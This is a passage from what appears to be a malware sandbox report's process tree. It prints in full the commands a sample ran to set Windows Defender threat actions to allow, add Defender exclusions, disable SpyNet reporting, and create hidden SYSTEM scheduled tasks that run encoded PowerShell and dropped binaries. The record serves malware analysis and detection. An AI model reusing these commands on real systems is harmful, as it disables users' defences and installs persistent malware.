      "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737503 /t REG_SZ /d 6 /reg:32
      4⤵
      PID:5420
  - - C:\Windows\SysWOW64\reg.exe
      "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737503 /t REG_SZ /d 6 /reg:64
      4⤵
      PID:5256
  - - C:\Windows\SysWOW64\reg.exe
      "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735503 /t REG_SZ /d 6 /reg:32
      4⤵
      PID:1476
  - - C:\Windows\SysWOW64\reg.exe
      "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735503 /t REG_SZ /d 6 /reg:64
      4⤵
      PID:7008
  - - C:\Windows\SysWOW64\reg.exe
      "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147749376 /t REG_SZ /d 6 /reg:32
      4⤵
      PID:5104
  - - C:\Windows\SysWOW64\reg.exe
      "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147749376 /t REG_SZ /d 6 /reg:64
      4⤵
      PID:7224
  - - C:\Windows\SysWOW64\reg.exe
      "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737394 /t REG_SZ /d 6 /reg:32
      4⤵
      PID:6520
  - - C:\Windows\SysWOW64\reg.exe
      "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737394 /t REG_SZ /d 6 /reg:64
      4⤵
      PID:896
- - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
    powershell "cmd /C REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\ACOkaPyEHSjbvhvMaqR\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\ACOkaPyEHSjbvhvMaqR\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\AfNWPhScxyylC\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\AfNWPhScxyylC\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\CaOqiYMiQPmU2\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\CaOqiYMiQPmU2\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\HpvPjMDmaiUn\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\HpvPjMDmaiUn\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\YSFbCTIaU\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\YSFbCTIaU\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\ProgramData\YwFgfawDzaFJYFVB\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\ProgramData\YwFgfawDzaFJYFVB\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Users\Admin\AppData\Local\Temp\JxJEfMIzPUZaCVKzU\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Users\Admin\AppData\Local\Temp\JxJEfMIzPUZaCVKzU\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Windows\Temp\gQxOXlbRXdqDUiOe\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Windows\Temp\gQxOXlbRXdqDUiOe\" /t REG_DWORD /d 0 /reg:64;"
    3⤵
    - Drops file in System32 directory
    - Modifies data under HKEY_USERS
    PID:4496
  - - C:\Windows\SysWOW64\cmd.exe
      "C:\Windows\system32\cmd.exe" /C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\ACOkaPyEHSjbvhvMaqR" /t REG_DWORD /d 0 /reg:32
      4⤵
      PID:8072
    - - C:\Windows\SysWOW64\reg.exe
        
        REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\ACOkaPyEHSjbvhvMaqR" /t REG_DWORD /d 0 /reg:32
        5⤵
        
        PID:5188
  - - C:\Windows\SysWOW64\reg.exe
      "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\ACOkaPyEHSjbvhvMaqR" /t REG_DWORD /d 0 /reg:64
      4⤵
      PID:2668
  - - C:\Windows\SysWOW64\reg.exe
      "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\AfNWPhScxyylC" /t REG_DWORD /d 0 /reg:32
      4⤵
      PID:7512
  - - C:\Windows\SysWOW64\reg.exe
      "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\AfNWPhScxyylC" /t REG_DWORD /d 0 /reg:64
      4⤵
      PID:7012
  - - C:\Windows\SysWOW64\reg.exe
      "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\CaOqiYMiQPmU2" /t REG_DWORD /d 0 /reg:32
      4⤵
      PID:6484
  - - C:\Windows\SysWOW64\reg.exe
      "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\CaOqiYMiQPmU2" /t REG_DWORD /d 0 /reg:64
      4⤵
      PID:6692
  - - C:\Windows\SysWOW64\reg.exe
      "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\HpvPjMDmaiUn" /t REG_DWORD /d 0 /reg:32
      4⤵
      PID:6284
  - - C:\Windows\SysWOW64\reg.exe
      "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\HpvPjMDmaiUn" /t REG_DWORD /d 0 /reg:64
      4⤵
      PID:6392
  - - C:\Windows\SysWOW64\reg.exe
      "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\YSFbCTIaU" /t REG_DWORD /d 0 /reg:32
      4⤵
      PID:7904
  - - C:\Windows\SysWOW64\reg.exe
      "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\YSFbCTIaU" /t REG_DWORD /d 0 /reg:64
      4⤵
      PID:6480
  - - C:\Windows\SysWOW64\reg.exe
      "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v C:\ProgramData\YwFgfawDzaFJYFVB /t REG_DWORD /d 0 /reg:32
      4⤵
      PID:5372
  - - C:\Windows\SysWOW64\reg.exe
      "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v C:\ProgramData\YwFgfawDzaFJYFVB /t REG_DWORD /d 0 /reg:64
      4⤵
      PID:8096
  - - C:\Windows\SysWOW64\reg.exe
      "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v C:\Users\Admin\AppData\Local\Temp\JxJEfMIzPUZaCVKzU /t REG_DWORD /d 0 /reg:32
      4⤵
      PID:8040
  - - C:\Windows\SysWOW64\reg.exe
      "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v C:\Users\Admin\AppData\Local\Temp\JxJEfMIzPUZaCVKzU /t REG_DWORD /d 0 /reg:64
      4⤵
      PID:7364
  - - C:\Windows\SysWOW64\reg.exe
      "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v C:\Windows\Temp\gQxOXlbRXdqDUiOe /t REG_DWORD /d 0 /reg:32
      4⤵
      PID:5144
  - - C:\Windows\SysWOW64\reg.exe
      "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v C:\Windows\Temp\gQxOXlbRXdqDUiOe /t REG_DWORD /d 0 /reg:64
      4⤵
      PID:8020
- - C:\Windows\SysWOW64\schtasks.exe
    schtasks /CREATE /TN "gBumTvfjY" /SC once /ST 01:08:59 /F /RU "Admin" /TR "powershell -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA=="
    3⤵
    - Blocklisted process makes network request
    - Creates scheduled task(s)
    PID:1036
- - C:\Windows\SysWOW64\schtasks.exe
    schtasks /run /I /tn "gBumTvfjY"
    3⤵
    PID:748
- - C:\Windows\SysWOW64\schtasks.exe
    schtasks /DELETE /F /TN "gBumTvfjY"
    3⤵
    PID:5824
- - C:\Windows\SysWOW64\schtasks.exe
    schtasks /CREATE /TN "hxUIoduwsSkQKnehv" /SC once /ST 04:00:57 /RU "SYSTEM" /TR "\"C:\Windows\Temp\gQxOXlbRXdqDUiOe\QWmmphvjSXLGJma\UbmPrUN.exe\" Tf /site_id 216660 /S" /V1 /F
    3⤵
    - Drops file in Windows directory
    - Creates scheduled task(s)
    PID:1844
- - C:\Windows\SysWOW64\schtasks.exe
    schtasks /run /I /tn "hxUIoduwsSkQKnehv"
    3⤵
    - Blocklisted process makes network request
    PID:1456
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE
  C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA==
  2⤵
  PID:6844
- - C:\Windows\system32\gpupdate.exe
    "C:\Windows\system32\gpupdate.exe" /force
    3⤵
    PID:4460
- C:\Windows\Temp\gQxOXlbRXdqDUiOe\QWmmphvjSXLGJma\UbmPrUN.exe
  C:\Windows\Temp\gQxOXlbRXdqDUiOe\QWmmphvjSXLGJma\UbmPrUN.exe Tf /site_id 216660 /S
  2⤵
  - Checks computer location settings
  - Drops desktop.ini file(s)
  - Drops file in System32 directory
  - Drops file in Program Files directory
  - Modifies data under HKEY_USERS
  PID:6224
- - C:\Windows\SysWOW64\cmd.exe
    "C:\Windows\System32\cmd.exe" /C forfiles /p c:\windows\system32 /m cmd.exe /c "cmd /C powershell WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ThreatIDDefaultAction_Ids=2147735503 ThreatIDDefaultAction_Actions=6 Force=True" & forfiles /p c:\windows\system32 /m cmd.exe /c "cmd /C powershell WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ThreatIDDefaultAction_Ids=2147737010 ThreatIDDefaultAction_Actions=6 Force=True" & forfiles /p c:\windows\system32 /m where.exe /c "cmd /C powershell WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ThreatIDDefaultAction_Ids=2147737007 ThreatIDDefaultAction_Actions=6 Force=True" & forfiles /p c:\windows\system32 /m help.exe /c "cmd /C powershell WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ThreatIDDefaultAction_Ids=2147737394 ThreatIDDefaultAction_Actions=6 Force=True" &
    3⤵
    PID:7696
  - - C:\Windows\SysWOW64\forfiles.exe
      forfiles /p c:\windows\system32 /m cmd.exe /c "cmd /C powershell WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ThreatIDDefaultAction_Ids=2147735503 ThreatIDDefaultAction_Actions=6 Force=True"
      4⤵
      PID:2596
    - - C:\Windows\SysWOW64\cmd.exe
        
        /C powershell WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ThreatIDDefaultAction_Ids=2147735503 ThreatIDDefaultAction_Actions=6 Force=True
        5⤵
        
        PID:5520
      - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        powershell WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ThreatIDDefaultAction_Ids=2147735503 ThreatIDDefaultAction_Actions=6 Force=True
        6⤵
        Drops file in System32 directory
        Modifies data under HKEY_USERS
        
        PID:7908
        
        C:\Windows\SysWOW64\Wbem\WMIC.exe
        
        "C:\Windows\System32\Wbem\WMIC.exe" /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ThreatIDDefaultAction_Ids=2147735503 ThreatIDDefaultAction_Actions=6 Force=True
        7⤵
        
        PID:2696
  - - C:\Windows\SysWOW64\forfiles.exe
      forfiles /p c:\windows\system32 /m cmd.exe /c "cmd /C powershell WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ThreatIDDefaultAction_Ids=2147737010 ThreatIDDefaultAction_Actions=6 Force=True"
      4⤵
      PID:6604
    - - C:\Windows\SysWOW64\cmd.exe
        
        /C powershell WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ThreatIDDefaultAction_Ids=2147737010 ThreatIDDefaultAction_Actions=6 Force=True
        5⤵
        
        PID:7960
      - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        powershell WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ThreatIDDefaultAction_Ids=2147737010 ThreatIDDefaultAction_Actions=6 Force=True
        6⤵
        Drops file in System32 directory
        Modifies data under HKEY_USERS
        
        PID:5856
        
        C:\Windows\SysWOW64\Wbem\WMIC.exe
        
        "C:\Windows\System32\Wbem\WMIC.exe" /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ThreatIDDefaultAction_Ids=2147737010 ThreatIDDefaultAction_Actions=6 Force=True
        7⤵
        
        PID:5912
  - - C:\Windows\SysWOW64\forfiles.exe
      forfiles /p c:\windows\system32 /m where.exe /c "cmd /C powershell WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ThreatIDDefaultAction_Ids=2147737007 ThreatIDDefaultAction_Actions=6 Force=True"
      4⤵
      PID:7008
    - - C:\Windows\SysWOW64\cmd.exe
        
        /C powershell WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ThreatIDDefaultAction_Ids=2147737007 ThreatIDDefaultAction_Actions=6 Force=True
        5⤵
        
        PID:5104
      - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        powershell WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ThreatIDDefaultAction_Ids=2147737007 ThreatIDDefaultAction_Actions=6 Force=True
        6⤵
        Drops file in System32 directory
        Modifies data under HKEY_USERS
        
        PID:7224
        
        C:\Windows\SysWOW64\Wbem\WMIC.exe
        
        "C:\Windows\System32\Wbem\WMIC.exe" /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ThreatIDDefaultAction_Ids=2147737007 ThreatIDDefaultAction_Actions=6 Force=True
        7⤵
        
        PID:7068
  - - C:\Windows\SysWOW64\forfiles.exe
      forfiles /p c:\windows\system32 /m help.exe /c "cmd /C powershell WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ThreatIDDefaultAction_Ids=2147737394 ThreatIDDefaultAction_Actions=6 Force=True"
      4⤵
      PID:7792
    - - C:\Windows\SysWOW64\cmd.exe
        
        /C powershell WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ThreatIDDefaultAction_Ids=2147737394 ThreatIDDefaultAction_Actions=6 Force=True
        5⤵
        
        PID:5248
      - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        powershell WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ThreatIDDefaultAction_Ids=2147737394 ThreatIDDefaultAction_Actions=6 Force=True
        6⤵
        Drops file in System32 directory
        Modifies data under HKEY_USERS
        
        PID:5728
        
        C:\Windows\SysWOW64\Wbem\WMIC.exe
        
        "C:\Windows\System32\Wbem\WMIC.exe" /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ThreatIDDefaultAction_Ids=2147737394 ThreatIDDefaultAction_Actions=6 Force=True
        7⤵
        
        PID:7348
- - C:\Windows\SysWOW64\schtasks.exe
    schtasks /DELETE /F /TN "bCQQUSYoXLKlZTQVFm"
    3⤵
    PID:7048
  - - C:\Windows\System32\Conhost.exe
      \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
      4⤵
      PID:5256
- - C:\Windows\SysWOW64\cmd.exe
    cmd /C REG DELETE "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /v "exe" /f /reg:32
    3⤵
    PID:6152
  - - C:\Windows\SysWOW64\reg.exe
      REG DELETE "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /v "exe" /f /reg:32
      4⤵
      PID:8176
- - C:\Windows\SysWOW64\cmd.exe
    cmd /C REG DELETE "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /v "exe" /f /reg:64
    3⤵
    PID:6536
  - - C:\Windows\SysWOW64\reg.exe
      REG DELETE "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /v "exe" /f /reg:64
      4⤵
      PID:1848
- - C:\Windows\SysWOW64\schtasks.exe
    schtasks /CREATE /TR "rundll32 \"C:\Program Files (x86)\YSFbCTIaU\wTtncs.dll\",#1" /RU "SYSTEM" /SC ONLOGON /TN "TXAwOSJqerYTzUX" /V1 /F
    3⤵
    - Drops file in Windows directory
    - Creates scheduled task(s)
    PID:6508
- - C:\Windows\SysWOW64\schtasks.exe
    schtasks /CREATE /TN "TXAwOSJqerYTzUX2" /F /xml "C:\Program Files (x86)\YSFbCTIaU\EcEMsvt.xml" /RU "SYSTEM"
    3⤵
    - Creates scheduled task(s)
    PID:8068
- - C:\Windows\SysWOW64\schtasks.exe
    schtasks /END /TN "TXAwOSJqerYTzUX"
    3⤵
    PID:5308
- - C:\Windows\SysWOW64\schtasks.exe
    schtasks /DELETE /F /TN "TXAwOSJqerYTzUX"
    3⤵
    PID:7084
- - C:\Windows\SysWOW64\schtasks.exe
    schtasks /CREATE /TN "MpGuFfBVdJflLk" /F /xml "C:\Program Files (x86)\CaOqiYMiQPmU2\CYTqTeQ.xml" /RU "SYSTEM"
    3⤵
    - Creates scheduled task(s)
    PID:6912
- - C:\Windows\SysWOW64\schtasks.exe
    schtasks /CREATE /TN "ZoXPCQOixILhL2" /F /xml "C:\ProgramData\YwFgfawDzaFJYFVB\JiSGqdT.xml" /RU "SYSTEM"
    3⤵
    - Creates scheduled task(s)
    PID:7024
- - C:\Windows\SysWOW64\schtasks.exe
    schtasks /CREATE /TN "TSZDlHjZcujaNcgsj2" /F /xml "C:\Program Files (x86)\ACOkaPyEHSjbvhvMaqR\yEHMdln.xml" /RU "SYSTEM"
    3⤵
    - Creates scheduled task(s)
    PID:3748
- - C:\Windows\SysWOW64\schtasks.exe
    schtasks /CREATE /TN "NrvtNKuORviNiFRYXGZ2" /F /xml "C:\Program Files (x86)\AfNWPhScxyylC\uhXvvFg.xml" /RU "SYSTEM"
    3⤵
    - Creates scheduled task(s)
    PID:6312
- - C:\Windows\SysWOW64\schtasks.exe
    schtasks /CREATE /TN "JWccChrZepOVqMLId" /SC once /ST 01:33:43 /RU "SYSTEM" /TR "rundll32 \"C:\Windows\Temp\gQxOXlbRXdqDUiOe\YpjwLIPw\tpwMjWf.dll\",#1 /site_id 216660" /V1 /F
    3⤵
    - Drops file in Windows directory
    - Creates scheduled task(s)
    PID:6356
- - C:\Windows\SysWOW64\schtasks.exe
    schtasks /run /I /tn "JWccChrZepOVqMLId"
    3⤵
    PID:8148
- - C:\Windows\SysWOW64\schtasks.exe
    schtasks /CREATE /TN "spuyhAIOUfZM" /SC once /ST 06:37:28 /F /RU "Admin" /TR "\"C:\Users\Admin\AppData\Local\Temp\JxJEfMIzPUZaCVKzU\crIoAsHR\mqQpCvn.exe\" wZ /S"
    3⤵
    - Creates scheduled task(s)
    PID:7456
- - C:\Windows\SysWOW64\schtasks.exe
    schtasks /run /I /tn "spuyhAIOUfZM"
    3⤵
    PID:6020
- - C:\Windows\SysWOW64\schtasks.exe
    schtasks /END /TN "spuyhAIOUfZM"
    3⤵
    PID:7732
- - C:\Windows\SysWOW64\schtasks.exe
    schtasks /DELETE /F /TN "spuyhAIOUfZM"
    3⤵
    PID:7808
- - C:\Windows\SysWOW64\cmd.exe
    cmd /C REG DELETE "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /v "SpyNetReporting" /f /reg:32
    3⤵
    PID:6908
  - - C:\Windows\SysWOW64\reg.exe
      REG DELETE "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /v "SpyNetReporting" /f /reg:32
      4⤵
      PID:7420
- - C:\Windows\SysWOW64\cmd.exe
    cmd /C REG DELETE "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /v "SpyNetReporting" /f /reg:64
    3⤵
    PID:7952
  - - C:\Windows\SysWOW64\reg.exe
      REG DELETE "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /v "SpyNetReporting" /f /reg:64
      4⤵
      PID:1248
- - C:\Windows\SysWOW64\schtasks.exe
    schtasks /DELETE /F /TN "hxUIoduwsSkQKnehv"
    3⤵
    PID:6852
- \??\c:\windows\system32\rundll32.EXE
  c:\windows\system32\rundll32.EXE "C:\Windows\Temp\gQxOXlbRXdqDUiOe\YpjwLIPw\tpwMjWf.dll",#1 /site_id 216660
  2⤵
  PID:5736
- - C:\Windows\SysWOW64\rundll32.exe
    c:\windows\system32\rundll32.EXE "C:\Windows\Temp\gQxOXlbRXdqDUiOe\YpjwLIPw\tpwMjWf.dll",#1 /site_id 216660
    3⤵
    - Blocklisted process makes network request
    - Checks BIOS information in registry
    - Loads dropped DLL
    - Drops file in System32 directory
    - Enumerates system info in registry
    PID:4332
  - - C:\Windows\SysWOW64\schtasks.exe
      schtasks /DELETE /F /TN "JWccChrZepOVqMLId"
      4⤵
      PID:4276
- C:\Users\Admin\AppData\Local\Temp\JxJEfMIzPUZaCVKzU\crIoAsHR\mqQpCvn.exe
  C:\Users\Admin\AppData\Local\Temp\JxJEfMIzPUZaCVKzU\crIoAsHR\mqQpCvn.exe wZ /S
  2⤵
  - Modifies Internet Explorer settings
  PID:6916
- - C:\Windows\SysWOW64\cmd.exe
    "C:\Windows\System32\cmd.exe" /C forfiles /p c:\windows\system32 /m ping.exe /c "cmd /C powershell WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ThreatIDDefaultAction_Ids=2147735503 ThreatIDDefaultAction_Actions=6 Force=True" & forfiles /p c:\windows\system32 /m where.exe /c "cmd /C powershell WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ThreatIDDefaultAction_Ids=2147737010 ThreatIDDefaultAction_Actions=6 Force=True" & forfiles /p c:\windows\system32 /m help.exe /c "cmd /C powershell WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ThreatIDDefaultAction_Ids=2147737007 ThreatIDDefaultAction_Actions=6 Force=True" & forfiles /p c:\windows\system32 /m waitfor.exe /c "cmd /C powershell WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ThreatIDDefaultAction_Ids=2147737394 ThreatIDDefaultAction_Actions=6 Force=True" &
    3⤵
    PID:7440
  - - C:\Windows\SysWOW64\forfiles.exe
      forfiles /p c:\windows\system32 /m ping.exe /c "cmd /C powershell WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ThreatIDDefaultAction_Ids=2147735503 ThreatIDDefaultAction_Actions=6 Force=True"
      4⤵
      PID:4268
    - - C:\Windows\SysWOW64\cmd.exe
        
        /C powershell WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ThreatIDDefaultAction_Ids=2147735503 ThreatIDDefaultAction_Actions=6 Force=True
        5⤵
        
        PID:2236
      - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        powershell WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ThreatIDDefaultAction_Ids=2147735503 ThreatIDDefaultAction_Actions=6 Force=True
        6⤵
        
        PID:6912
        
        C:\Windows\SysWOW64\Wbem\WMIC.exe
        
        "C:\Windows\System32\Wbem\WMIC.exe" /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ThreatIDDefaultAction_Ids=2147735503 ThreatIDDefaultAction_Actions=6 Force=True
        7⤵
        
        PID:4792
  - - C:\Windows\SysWOW64\forfiles.exe
      forfiles /p c:\windows\system32 /m where.exe /c "cmd /C powershell WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ThreatIDDefaultAction_Ids=2147737010 ThreatIDDefaultAction_Actions=6 Force=True"
      4⤵
      PID:6444
    - - C:\Windows\SysWOW64\cmd.exe
        
        /C powershell WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ThreatIDDefaultAction_Ids=2147737010 ThreatIDDefaultAction_Actions=6 Force=True
        5⤵
        
        PID:7504
      - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        powershell WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ThreatIDDefaultAction_Ids=2147737010 ThreatIDDefaultAction_Actions=6 Force=True
        6⤵
        
        PID:7444
        
        C:\Windows\SysWOW64\Wbem\WMIC.exe
        
        "C:\Windows\System32\Wbem\WMIC.exe" /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ThreatIDDefaultAction_Ids=2147737010 ThreatIDDefaultAction_Actions=6 Force=True
        7⤵
        
        PID:7864
  - - C:\Windows\SysWOW64\forfiles.exe
      forfiles /p c:\windows\system32 /m help.exe /c "cmd /C powershell WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ThreatIDDefaultAction_Ids=2147737007 ThreatIDDefaultAction_Actions=6 Force=True"
      4⤵
      PID:6036
    - - C:\Windows\SysWOW64\cmd.exe
        
        /C powershell WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ThreatIDDefaultAction_Ids=2147737007 ThreatIDDefaultAction_Actions=6 Force=True
        5⤵
        
        PID:3344
      - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
